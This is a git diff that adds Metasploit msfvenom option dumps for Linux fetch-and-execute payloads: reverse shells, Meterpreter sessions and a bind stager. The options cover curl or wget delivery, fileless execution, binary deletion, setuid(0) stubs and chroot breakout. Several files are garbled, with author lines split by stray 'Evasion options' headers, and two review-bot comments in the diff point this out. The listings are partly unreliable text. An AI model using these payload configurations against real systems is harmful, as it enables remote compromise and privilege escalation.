+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + 
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_reverse_tcp.txt new file mode 100644 index 0000000..9c2870c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_reverse_tcp.txt 
@@ -0,0 +1,90 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/ppc64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vMuOhwKQFM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTPS server. 
+ Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template 
+ MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_http.txt new file mode 100644 index 0000000..d70d2a9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_http.txt 
@@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc64le/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/ppc64le/meterpreter_reverse_http: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NNtHJhAv no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the 
payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_https.txt new file mode 100644 index 0000000..51f116f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_https.txt 
@@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc64le/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/https/ppc64le/meterpreter_reverse_https: +========================= + +pid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME alVfIAdAF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..bbefdf0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_tcp.txt 
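Review bot: the "Provided by" block in this hunk is corrupted: it reads "Br", then the "Evasion options for payload/cmd/linux/https/ppc64le/meterpreter_reverse_https:" header with its underline, then the fragments "pid7.com>" and "timwr". An author line split around a header the tool prints separately is what unordered capture of two output streams looks like, so please regenerate this file with both streams merged in order (`> file 2>&1`, not `2>&1 > file`) and confirm the author list is intact before committing.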
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME oTeBkoZeOXsG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-exec.txt b/msfvenom/payload_options/cmd-linux-https-x64-exec.txt new file mode 100644 index 0000000..c14837c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-exec.txt 
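Review bot: the FETCH_FILENAME default in this hunk ("oTeBkoZeOXsG") is a random per-run value, and "Total size: 116" versus 107 in the ppc64le meterpreter_reverse_https file is consistent with the size line depending on that random name; these dumps will therefore change on every regeneration even when nothing in the module changed. Suggest post-processing the output to replace the random filename default with a fixed placeholder and to drop or normalize "Total size", so later diffs stay reviewable. The "Provided by" block here is also empty, with the e-mail fragment "k@rapid7.com>" appearing below the "Evasion options" header, so this file needs the same regeneration as the others.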
@@ -0,0 +1,76 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/x64/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + ricky + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ksIYQDjPEh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. 
+ Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub 
that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..bef13f9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-bind_tcp.txt 
@@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Bind TCP Stager + Module: payload/cmd/linux/https/x64/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 110 + +Evasion options for payload/cmd/linux/https/x64/meterpreter/bind_tcp: +========================= + +options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CrfpshHaCU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
